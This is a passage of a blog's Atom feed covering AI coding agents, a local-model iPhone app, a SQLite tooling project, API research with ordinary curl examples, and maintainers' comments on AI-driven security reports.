&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/gemini-agent-skills.jpg" alt="Screenshot of an &amp;quot;Agent Skills&amp;quot; chat interface using the Gemma-4-E2B-it model. The user prompt reads &amp;quot;Show me the Castro Theatre on a map.&amp;quot; The model response, labeled &amp;quot;Model on GPU,&amp;quot; shows it &amp;quot;Called JS skill &amp;#39;interactive-map/index.html&amp;#39;&amp;quot; and displays an embedded Google Map centered on a red pin at The Castro Theatre in San Francisco, with nearby landmarks visible including Starbelly, Cliff&amp;#39;s Variety, Blind Butcher, GLBT Historical Society Museum, and Fable. An &amp;quot;Open in Maps&amp;quot; link and &amp;quot;View in full screen&amp;quot; button are shown. Below the map, the model states &amp;quot;The interactive map view for the Castro Theatre has been shown.&amp;quot; with a response time of 2.4 s. A text input field with &amp;quot;Type prompt...&amp;quot; placeholder, a &amp;quot;+&amp;quot; button, and a &amp;quot;Skills&amp;quot; button appear at the bottom." style="max-width: min(400px, 100%); margin: 0 auto; display: block;"&gt;&lt;/p&gt;
&lt;p&gt;(That demo did freeze the app when I tried to add a follow-up prompt though.)&lt;/p&gt;
&lt;p&gt;This is the first time I've seen a local model vendor release an official app for trying out their models on an iPhone. Sadly it's missing permanent logs - conversations with this app are ephemeral.&lt;/p&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47652561"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/iphone"&gt;iphone&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-tool-use"&gt;llm-tool-use&lt;/a&gt;&lt;/p&gt;



</summary><category term="gemini"/><category term="iphone"/><category term="google"/><category term="generative-ai"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="llm-tool-use"/></entry><entry><title>Eight years of wanting, three months of building with AI</title><link href="https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-tag" rel="alternate"/><published>2026-04-05T23:54:18+00:00</published><updated>2026-04-05T23:54:18+00:00</updated><id>https://simonwillison.net/2026/Apr/5/building-with-ai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://lalitm.com/post/building-syntaqlite-ai/"&gt;Eight years of wanting, three months of building with AI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Lalit Maganti provides one of my favorite pieces of long-form writing on agentic engineering I've seen in ages.&lt;/p&gt;
&lt;p&gt;They spent eight years thinking about and then three months building &lt;a href="https://github.com/lalitMaganti/syntaqlite"&gt;syntaqlite&lt;/a&gt;, which they describe as "&lt;a href="https://lalitm.com/post/syntaqlite/"&gt;high-fidelity devtools that SQLite deserves&lt;/a&gt;".&lt;/p&gt;
&lt;p&gt;The goal was to provide fast, robust and comprehensive linting and verifying tools for SQLite, suitable for use in language servers and other development tools - a parser, formatter, and verifier for SQLite queries. I've found myself wanting this kind of thing in the past, hence my (far less production-ready) &lt;a href="https://simonwillison.net/2026/Jan/30/sqlite-ast-2/"&gt;sqlite-ast&lt;/a&gt; project from a few months ago.&lt;/p&gt;
&lt;p&gt;Lalit had been procrastinating on this project for years, because of the inevitable tedium of needing to work through 400+ grammar rules to help build a parser. That's exactly the kind of tedious work that coding agents excel at!&lt;/p&gt;
&lt;p&gt;Claude Code helped get over that initial hump and build the first prototype:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AI basically let me put aside all my doubts on technical calls, my uncertainty of building the right thing and my reluctance to get started by giving me very concrete problems to work on. Instead of “I need to understand how SQLite’s parsing works”, it was “I need to get AI to suggest an approach for me so I can tear it up and build something better". I work so much better with concrete prototypes to play with and code to look at than endlessly thinking about designs in my head, and AI lets me get to that point at a pace I could not have dreamed about before. Once I took the first step, every step after that was so much easier.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That first vibe-coded prototype worked great as a proof of concept, but they eventually made the decision to throw it away and start again from scratch. AI worked great for the low level details but did not produce a coherent high-level architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I found that AI made me procrastinate on key design decisions. Because refactoring was cheap, I could always say “I’ll deal with this later.” And because AI could refactor at the same industrial scale it generated code, the cost of deferring felt low. But it wasn’t: deferring decisions corroded my ability to think clearly because the codebase stayed confusing in the meantime.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The second attempt took a lot longer and involved a great deal more human-in-the-loop decision making, but the result is a robust library that can stand the test of time.&lt;/p&gt;
&lt;p&gt;It's worth setting aside some time to read this whole thing - it's full of non-obvious downsides to working heavily with AI, as well as a detailed explanation of how they overcame those hurdles.&lt;/p&gt;
&lt;p&gt;The key idea I took away from this concerns AI's weakness in terms of design and architecture:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful. The architecture of the project was the clearest case: I spent weeks in the early days following AI down dead ends, exploring designs that felt productive in the moment but collapsed under scrutiny. In hindsight, I have to wonder if it would have been faster just thinking it through without AI in the loop at all.&lt;/p&gt;
&lt;p&gt;But expertise alone isn’t enough. Even when I understood a problem deeply, AI still struggled if the task had no objectively checkable answer. Implementation has a right answer, at least at a local level: the code compiles, the tests pass, the output matches what you asked for. Design doesn’t. We’re still arguing about OOP decades after it first took off.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47648828"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="vibe-coding"/><category term="ai-assisted-programming"/><category term="sqlite"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Chengpeng Mou</title><link href="https://simonwillison.net/2026/Apr/5/chengpeng-mou/#atom-tag" rel="alternate"/><published>2026-04-05T21:47:06+00:00</published><updated>2026-04-05T21:47:06+00:00</updated><id>https://simonwillison.net/2026/Apr/5/chengpeng-mou/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://twitter.com/cpmou2022/status/2040606209800290404"&gt;&lt;p&gt;From anonymized U.S. ChatGPT data, we are seeing:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;~2M weekly messages on health insurance&lt;/li&gt;
&lt;li&gt;~600K weekly messages [classified as healthcare] from people living in “hospital deserts” (30 min drive to nearest hospital)&lt;/li&gt;
&lt;li&gt;7 out of 10 msgs happen outside clinic hours&lt;/li&gt;
&lt;/ul&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://twitter.com/cpmou2022/status/2040606209800290404"&gt;Chengpeng Mou&lt;/a&gt;, Head of Business Finance, OpenAI&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-ethics"/><category term="generative-ai"/><category term="openai"/><category term="chatgpt"/><category term="ai"/><category term="llms"/></entry><entry><title>research-llm-apis 2026-04-04</title><link href="https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag" rel="alternate"/><published>2026-04-05T00:32:11+00:00</published><updated>2026-04-05T00:32:11+00:00</updated><id>https://simonwillison.net/2026/Apr/5/research-llm-apis/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;strong&gt;Release:&lt;/strong&gt; &lt;a href="https://github.com/simonw/research-llm-apis/releases/tag/2026-04-04"&gt;research-llm-apis 2026-04-04&lt;/a&gt;&lt;/p&gt;
    &lt;p&gt;I'm working on a &lt;a href="https://github.com/simonw/llm/issues/1314"&gt;major change&lt;/a&gt; to my LLM Python library and CLI tool. LLM provides an abstraction layer over hundreds of different LLMs from dozens of different vendors thanks to its plugin system, and some of those vendors have grown new features over the past year which LLM's abstraction layer can't handle, such as server-side tool execution.&lt;/p&gt;
&lt;p&gt;To help design that new abstraction layer I had Claude Code read through the Python client libraries for Anthropic, OpenAI, Gemini and Mistral and use those to help craft &lt;code&gt;curl&lt;/code&gt; commands to access the raw JSON for both streaming and non-streaming modes across a range of different scenarios. Both the scripts and the captured outputs now live in this new repo.&lt;/p&gt;
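&lt;p&gt;The commands in question look something like this sketch for OpenAI's Chat Completions endpoint - the model name and prompt here are illustrative, not taken from the repo, and &lt;code&gt;$OPENAI_API_KEY&lt;/code&gt; needs to be set:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Non-streaming: one complete JSON response body
curl https://api.openai.com/v1/chat/completions \
  -H "Authorization: Bearer $OPENAI_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"model": "gpt-5.1", "messages": [{"role": "user", "content": "hi"}]}'

# Streaming: server-sent events, one "data:" line per chunk
curl -N https://api.openai.com/v1/chat/completions \
  -H "Authorization: Bearer $OPENAI_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{"model": "gpt-5.1", "messages": [{"role": "user", "content": "hi"}],
       "stream": true}'&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Capturing both forms matters because the streaming and non-streaming JSON shapes differ for every vendor, and the abstraction layer needs to handle both.&lt;/p&gt;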
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/json"&gt;json&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm"&gt;llm&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="json"/><category term="llms"/><category term="llm"/></entry><entry><title>Vulnerability Research Is Cooked</title><link href="https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag" rel="alternate"/><published>2026-04-03T23:59:08+00:00</published><updated>2026-04-03T23:59:08+00:00</updated><id>https://simonwillison.net/2026/Apr/3/vulnerability-research-is-cooked/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://sockpuppet.org/blog/2026/03/30/vulnerability-research-is-cooked/"&gt;Vulnerability Research Is Cooked&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thomas Ptacek's take on the sudden and enormous impact the latest frontier models are having on the field of vulnerability research.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Within the next few months, coding agents will drastically alter both the practice and the economics of exploit development. Frontier model improvement won’t be a slow burn, but rather a step function. Substantial amounts of high-impact vulnerability research (maybe even most of it) will happen simply by pointing an agent at a source tree and typing “find me zero days”.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Why are agents so good at this? A combination of baked-in knowledge, pattern matching ability and brute force:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You can't design a better problem for an LLM agent than exploitation research.&lt;/p&gt;
&lt;p&gt;Before you feed it a single token of context, a frontier LLM already encodes supernatural amounts of correlation across vast bodies of source code. Is the Linux KVM hypervisor connected to the &lt;code&gt;hrtimer&lt;/code&gt; subsystem, &lt;code&gt;workqueue&lt;/code&gt;, or &lt;code&gt;perf_event&lt;/code&gt;? The model knows.&lt;/p&gt;
&lt;p&gt;Also baked into those model weights: the complete library of documented "bug classes" on which all exploit development builds: stale pointers, integer mishandling, type confusion, allocator grooming, and all the known ways of promoting a wild write to a controlled 64-bit read/write in Firefox.&lt;/p&gt;
&lt;p&gt;Vulnerabilities are found by pattern-matching bug classes and constraint-solving for reachability and exploitability. Precisely the implicit search problems that LLMs are most gifted at solving. Exploit outcomes are straightforwardly testable success/failure trials. An agent never gets bored and will search forever if you tell it to.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The article was partly inspired by &lt;a href="https://securitycryptographywhatever.com/2026/03/25/ai-bug-finding/"&gt;this episode of the Security Cryptography Whatever podcast&lt;/a&gt;, where David Adrian, Deirdre Connolly, and Thomas interviewed Anthropic's Nicholas Carlini for 1 hour 16 minutes.&lt;/p&gt;
&lt;p&gt;I just started a new tag here for &lt;a href="https://simonwillison.net/tags/ai-security-research/"&gt;ai-security-research&lt;/a&gt; - it's up to 11 posts already.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/thomas-ptacek"&gt;thomas-ptacek&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/careers"&gt;careers&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/nicholas-carlini"&gt;nicholas-carlini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;&lt;/p&gt;



</summary><category term="thomas-ptacek"/><category term="careers"/><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/><category term="ai"/><category term="llms"/><category term="nicholas-carlini"/><category term="ai-ethics"/></entry><entry><title>The cognitive impact of coding agents</title><link href="https://simonwillison.net/2026/Apr/3/cognitive-cost/#atom-tag" rel="alternate"/><published>2026-04-03T23:57:04+00:00</published><updated>2026-04-03T23:57:04+00:00</updated><id>https://simonwillison.net/2026/Apr/3/cognitive-cost/#atom-tag</id><summary type="html">
    &lt;p&gt;A fun thing about &lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/"&gt;recording a podcast&lt;/a&gt; with a professional like Lenny Rachitsky is that his team know how to slice the resulting video up into TikTok-sized short form vertical videos. Here's &lt;a href="https://x.com/lennysan/status/2039845666680176703"&gt;one he shared on Twitter today&lt;/a&gt; which ended up attracting over 1.1m views!&lt;/p&gt;
&lt;p&gt;&lt;video
  src="https://static.simonwillison.net/static/2026/cognitive-cost.mp4"
  poster="https://static.simonwillison.net/static/2026/cognitive-cost-poster.jpg"
  controls
  preload="none"
  playsinline
  style="display:block; max-width:400px; width:100%; height:auto; margin:0 auto"
&gt;&lt;track src="https://static.simonwillison.net/static/2026/cognitive-cost.vtt" kind="captions" srclang="en" label="English"&gt;&lt;/video&gt;
&lt;/p&gt;
&lt;p&gt;That was 48 seconds. Our &lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/"&gt;full conversation&lt;/a&gt; lasted 1 hour 40 minutes.&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/podcast-appearances"&gt;podcast-appearances&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cognitive-debt"&gt;cognitive-debt&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai-ethics"/><category term="coding-agents"/><category term="agentic-engineering"/><category term="generative-ai"/><category term="podcast-appearances"/><category term="ai"/><category term="llms"/><category term="cognitive-debt"/></entry><entry><title>Quoting Willy Tarreau</title><link href="https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag" rel="alternate"/><published>2026-04-03T21:48:22+00:00</published><updated>2026-04-03T21:48:22+00:00</updated><id>https://simonwillison.net/2026/Apr/3/willy-tarreau/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://lwn.net/Articles/1065620/"&gt;&lt;p&gt;On the kernel security list we've seen a huge bump of reports. We were between 2 and 3 per week maybe two years ago, then reached probably 10 a week over the last year with the only difference being only AI slop, and now since the beginning of the year we're around 5-10 per day depending on the days (fridays and tuesdays seem the worst). Now most of these reports are correct, to the point that we had to bring in more maintainers to help us.&lt;/p&gt;
&lt;p&gt;And we're now seeing on a daily basis something that never happened before: duplicate reports, or the same bug found by two different people using (possibly slightly) different tools.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://lwn.net/Articles/1065620/"&gt;Willy Tarreau&lt;/a&gt;, Lead Software Developer. HAPROXY&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Daniel Stenberg</title><link href="https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag" rel="alternate"/><published>2026-04-03T21:46:07+00:00</published><updated>2026-04-03T21:46:07+00:00</updated><id>https://simonwillison.net/2026/Apr/3/daniel-stenberg/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://mastodon.social/@bagder/116336957584445742"&gt;&lt;p&gt;The challenge with AI in open source security has transitioned from an AI slop tsunami into more of a ... plain security report tsunami. Less slop but lots of reports. Many of them really good.&lt;/p&gt;
&lt;p&gt;I'm spending hours per day on this now. It's intense.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://mastodon.social/@bagder/116336957584445742"&gt;Daniel Stenberg&lt;/a&gt;, lead developer of cURL&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/daniel-stenberg"&gt;daniel-stenberg&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/curl"&gt;curl&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="daniel-stenberg"/><category term="security"/><category term="curl"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Quoting Greg Kroah-Hartman</title><link href="https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag" rel="alternate"/><published>2026-04-03T21:44:41+00:00</published><updated>2026-04-03T21:44:41+00:00</updated><id>https://simonwillison.net/2026/Apr/3/greg-kroah-hartman/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;&lt;p&gt;Months ago, we were getting what we called 'AI slop,' AI-generated security reports that were obviously wrong or low quality. It was kind of funny. It didn't really worry us.&lt;/p&gt;
&lt;p&gt;Something happened a month ago, and the world switched. Now we have real reports. All open source projects have real reports that are made with AI, but they're good, and they're real.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www.theregister.com/2026/03/26/greg_kroahhartman_ai_kernel/"&gt;Greg Kroah-Hartman&lt;/a&gt;, Linux kernel maintainer (&lt;a href="https://en.wikipedia.org/wiki/Greg_Kroah-Hartman"&gt;bio&lt;/a&gt;), in conversation with Steven J. Vaughan-Nichols&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/linux"&gt;linux&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="linux"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="ai-security-research"/></entry><entry><title>Highlights from my conversation about agentic engineering on Lenny's Podcast</title><link href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#atom-tag" rel="alternate"/><published>2026-04-02T20:40:47+00:00</published><updated>2026-04-02T20:40:47+00:00</updated><id>https://simonwillison.net/2026/Apr/2/lennys-podcast/#atom-tag</id><summary type="html">
    &lt;p&gt;I was a guest on Lenny Rachitsky's podcast, in a new episode titled &lt;a href="https://www.lennysnewsletter.com/p/an-ai-state-of-the-union"&gt;An AI state of the union: We've passed the inflection point, dark factories are coming, and automation timelines&lt;/a&gt;. It's available on &lt;a href="https://youtu.be/wc8FBhQtdsA"&gt;YouTube&lt;/a&gt;, &lt;a href="https://open.spotify.com/episode/0DVjwLT6wgtscdB78Qf1BQ"&gt;Spotify&lt;/a&gt;, and &lt;a href="https://podcasts.apple.com/us/podcast/an-ai-state-of-the-union-weve-passed-the/id1627920305?i=1000758850377"&gt;Apple Podcasts&lt;/a&gt;. Here are my highlights from our conversation, with relevant links.&lt;/p&gt;

&lt;iframe style="margin-top: 1.5em; margin-bottom: 1.5em;" width="560" height="315" src="https://www.youtube-nocookie.com/embed/wc8FBhQtdsA" title="Why we’ve passed the AI inflection point and automation has already started | Simon Willison" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen="allowfullscreen"&gt; &lt;/iframe&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-november-inflection-point"&gt;The November inflection point&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#software-engineers-as-bellwethers-for-other-information-workers"&gt;Software engineers as bellwethers for other information workers&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#writing-code-on-my-phone"&gt;Writing code on my phone&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#responsible-vibe-coding"&gt;Responsible vibe coding&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#dark-factories-and-strongdm"&gt;Dark Factories and StrongDM&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-bottleneck-has-moved-to-testing"&gt;The bottleneck has moved to testing&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#this-stuff-is-exhausting"&gt;This stuff is exhausting&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#interruptions-cost-a-lot-less-now"&gt;Interruptions cost a lot less now&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#my-ability-to-estimate-software-is-broken"&gt;My ability to estimate software is broken&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-tough-for-people-in-the-middle"&gt;It's tough for people in the middle&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#it-s-harder-to-evaluate-software"&gt;It's harder to evaluate software&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-misconception-that-ai-tools-are-easy"&gt;The misconception that AI tools are easy&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#coding-agents-are-useful-for-security-research-now"&gt;Coding agents are useful for security research now&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#openclaw"&gt;OpenClaw&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#journalists-are-good-at-dealing-with-unreliable-sources"&gt;Journalists are good at dealing with unreliable sources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#the-pelican-benchmark"&gt;The pelican benchmark&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#and-finally-some-good-news-about-parrots"&gt;And finally, some good news about parrots&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Apr/2/lennys-podcast/#youtube-chapters"&gt;YouTube chapters&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id="the-november-inflection-point"&gt;The November inflection point&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=269"&gt;4:19&lt;/a&gt; - The end result of these two labs throwing everything they had at making their models better at code is that in November we had what I call the &lt;a href="https://simonwillison.net/tags/november-2025-inflection/"&gt;inflection point&lt;/a&gt; where GPT 5.1 and Claude Opus 4.5 came along.&lt;/p&gt;
&lt;p&gt;They were both incrementally better than the previous models, but in a way that crossed a threshold where previously the code would mostly work, but you had to pay very close attention to it. And suddenly we went from that to... almost all of the time it does what you told it to do, which makes all of the difference in the world.&lt;/p&gt;
&lt;p&gt;Now you can spin up a coding agent and say, &lt;a href="https://simonwillison.net/2026/Feb/25/present/"&gt;build me a Mac application that does this thing&lt;/a&gt;, and you'll get something back which won't just be a buggy pile of rubbish that doesn't do anything.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="software-engineers-as-bellwethers-for-other-information-workers"&gt;Software engineers as bellwethers for other information workers&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://youtu.be/wc8FBhQtdsA?t=349"&gt;5:49&lt;/a&gt; - I can churn out 10,000 lines of code in a day. And most of it works. Is that good? Like, how do we get from most of it works to all of it works? There are so many new questions that we're facing, which I think makes us a bellwether for other information workers.&lt;/p&gt;
&lt;p&gt;Code is easier than almost every other problem that you pose these agents because code is obviously right or wrong - either it works or it doesn't work. There might be a few subtle hidden bugs, but generally you can tell if the thing actually works.&lt;/p&gt;
&lt;p&gt;If it writes you an essay, if it prepares a lawsuit for you, it's so much harder to derive if it's actually done a good job, and to figure out if it got things right or wrong. But it's happening to us as software engineers. It came for us first.&lt;/p&gt;
&lt;p&gt;And we're figuring out, OK, what do our careers look like? How do we work as teams when part of what we did that used to take most of the time doesn't take most of the time anymore? What does that look like? And it's going to be very interesting seeing how this rolls out to other information work in the future.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Lawyers are falling for this really badly. The &lt;a href="https://www.damiencharlotin.com/hallucinations/"&gt;AI hallucination cases database&lt;/a&gt; is up to 1,228 cases now!&lt;/p&gt;
&lt;p&gt;Plus this bit from the cold open at &lt;a href="https://www.youtube.com/watch?v=wc8FBhQtdsA&amp;amp;t=0s"&gt;the start&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It used to be you'd ask ChatGPT for some code, and it would spit out some code, and you'd have to run it and test it. The coding agents take that step for you now. And an open question for me is how many other knowledge work fields are actually prone to these agent loops?&lt;/p&gt;
&lt;/blockquote&gt;
